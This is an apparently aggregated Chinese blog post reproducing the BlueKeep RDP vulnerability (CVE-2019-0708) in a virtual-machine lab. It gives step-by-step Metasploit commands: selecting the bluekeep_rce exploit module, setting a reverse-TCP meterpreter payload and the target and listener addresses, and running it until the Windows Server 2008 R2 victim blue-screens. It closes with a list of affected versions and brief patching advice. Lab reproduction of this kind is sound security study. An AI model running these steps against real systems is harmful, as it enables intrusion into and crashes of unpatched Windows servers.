cve-2019-0708 远程桌面代码执行漏洞复现

Posted cowherd

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了cve-2019-0708 远程桌面代码执行漏洞复现相关的知识,希望对你有一定的参考价值。

1.漏洞简介:

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。

2.环境搭建:

攻击机:虚拟机kali-2019(已经收纳cve-2019-0708漏洞利用模块)

受害机:虚拟机windws server 2008 R2

windows 2008开启3389端口。

技术图片

 

 windows 2008关闭防火墙(控制面板——系统和安全——windows防火墙——打开或关闭windows防火墙)。

技术图片

 

 这样我们整个环境部署完成。

3.漏洞复现:

使用kali打开metasploit。

msfconsole

搜索cve-2019-0708。

search cve-2019-0708

技术图片

 

 使用攻击模块。

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

技术图片

 

 写入payload。

set payload windows/x64/meterpeter/recverse_tcp

技术图片

 

 查看配置。

show options

技术图片

 

 写入目标ip、本机ip。

set RHOSTS
set LHOST

技术图片

 

 写入主机。

set target 3

这里我们使用的是vmware所以选择3就行,

技术图片

 

 开始攻击

run/exploit

技术图片

 

 发现我们windows 2008立马蓝屏。

技术图片

 

 4.影响版本:

windows2003

windows2008

windows2008 R2

windows xp

5.安全建议:

下载官方补丁。

以上是关于cve-2019-0708 远程桌面代码执行漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

Microsoft Windows 远程桌面服务远程执行代码漏洞(CVE-2019-0708)

CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

windows RDP远程代码执行_CVE-2019-0708漏洞复现

cve-2019-0708复现及经验总结

CVE-2019-0708漏洞复现

CVE-2019-0708 漏洞分析及相关测试